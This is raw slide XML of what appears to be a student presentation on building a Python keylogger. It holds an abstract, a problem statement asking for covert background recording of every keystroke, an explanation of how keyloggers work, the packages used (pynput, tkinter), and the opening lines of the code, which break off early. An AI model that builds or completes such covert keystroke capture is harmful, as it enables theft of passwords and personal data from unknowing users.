        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13434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75138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Outline:</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1600" y="1807779"/>
            <a:ext cx="9601200" cy="4059621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-382588">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-lt"/>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Abstract</a:t>
            </a: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Problem Statement </a:t>
            </a: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Explanation of Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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Coding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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Result (Output)</a:t>
            </a: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pPr marL="685800" indent="-382588">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-lt"/>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a:p>
            <a:pPr marL="685800" indent="-382588"/>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91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1496354"/>
            <a:ext cx="8361229" cy="2098226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thank You…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA5BD5B-14A9-55FA-2844-444397432D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095742" y="4076700"/>
            <a:ext cx="4673600" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Prepared  by:</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Santhosh R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	(820421205059)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Department of Information Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2259698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DF7BA0-A1ED-430B-3886-8CAAD2F74C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033670" y="1319096"/>
            <a:ext cx="2610678" cy="575965"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Abstract:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81879110-EA46-F5A1-3BF0-B953DDB71322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107095" y="1895062"/>
            <a:ext cx="8680175" cy="3643842"/>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just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A keylogger is a type of software tool designed to record and log every keystroke made on a computer. This includes keystrokes typed into any application, such as web browsers, word processors, instant messaging programs, and even passwords. Keyloggers are often used for various purposes, ranging from legitimate ones such as parental control and employee monitoring to malicious activities like stealing sensitive information such as passwords, credit card numbers, and other personal data.</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2134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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Problem Statement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38400" y="1895061"/>
            <a:ext cx="8534400" cy="3220277"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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The objective of this project is to develop a keylogger application capable of discreetly recording keystrokes made by a user on a computer keyboard. The keylogger should operate silently in the background, capturing all keystrokes without interfering with the user's normal activities. Additionally, the application should have the ability to store the recorded keystrokes securely and provide options for viewing and managing the logged data.</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41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1F8C-80C4-C4C4-0C63-DBFA674F2FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Explanation of Keylogger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C3F6F2-B61B-4247-84C3-C9BD0FA499F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790700" y="1473200"/>
            <a:ext cx="10274300" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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	A keylogger is a type of software or hardware device that records every keystroke made by a user on a computer or a mobile device. This means it keeps a record of every letter, number, symbol, or function key that is pressed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"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1. Installation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The keylogger software can be installed on a computer or a mobile device either intentionally or without the user's knowledge. Sometimes, it's disguised as a legitimate program or hidden within another piece of software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"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2. Recording keystrokes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Once installed, the keylogger silently runs in the background, capturing every keystroke made by the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"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3. Log creation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It then creates a log of all the keystrokes, which can include usernames, passwords, credit card numbers, messages, emails, and anything else typed on the keyboard.</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337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7FD6-C420-ED97-4950-45E43F0545D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="1536700"/>
            <a:ext cx="10299700" cy="4521200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. Transmission of data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some keyloggers are programmed to periodically send this log to a remote location, allowing whoever installed the keylogger to access the information remotely.</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	There are both legitimate and malicious uses for keyloggers. Legitimate uses include monitoring children's online activities or tracking employee computer usage. However, keyloggers can also be used by hackers or malicious software to steal sensitive information such as passwords, credit card numbers, and other personal data. </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	To protect yourself from malicious keyloggers, it's essential to have up-to-date antivirus software, avoid downloading software from untrusted sources, and be cautious of clicking on links or downloading attachments from suspicious emails or websites.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3655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1EBD-C5B9-9F40-3797-9E186F1A3008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="238539"/>
            <a:ext cx="9601200" cy="1485900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD8B2AB-EA31-DF3A-9D26-BADCEC51B84B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="981489"/>
            <a:ext cx="9601200" cy="1649896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Python is often used to create keyloggers because it's a powerful and easy-to-use programming language. With Python, developers can easily capture and record keystrokes from a keyboard without the user knowing. This makes it useful for monitoring computer activity, although it's important to remember that using keyloggers without permission is illegal and unethical.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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EDDE384D-3EB8-7F46-53A0-D7D9AC1AC920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2348496"/>
            <a:ext cx="9786730" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Packages Used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1"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en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="720725" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" b="1"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Tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is a standard GUI (Graphical User Interface) toolkit for Python. It provides a way to create desktop applications with graphical interfaces. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is based on the Tk GUI toolkit, which originated as part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (Tool Command Language) scripting language. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="720725" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="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It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>is a Python library that allows you to monitor and control input devices such as the mouse and keyboard. It provides functionalities to listen to events from the keyboard and mouse, as well as to control them programmatically.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="720725" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n Python, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> package is used to work with JSON (JavaScript Object Notation) data. JSON is a lightweight data interchange format commonly used for transmitting data between a server and a web application, or for storing configuration settings. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> module in Python provides functions for encoding Python objects into JSON format and decoding JSON data back into Python objects.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"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318822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F07CC2-90E4-BF3C-29BB-11BA0E125F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1103243" y="172278"/>
            <a:ext cx="9985513" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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a:p>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 = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
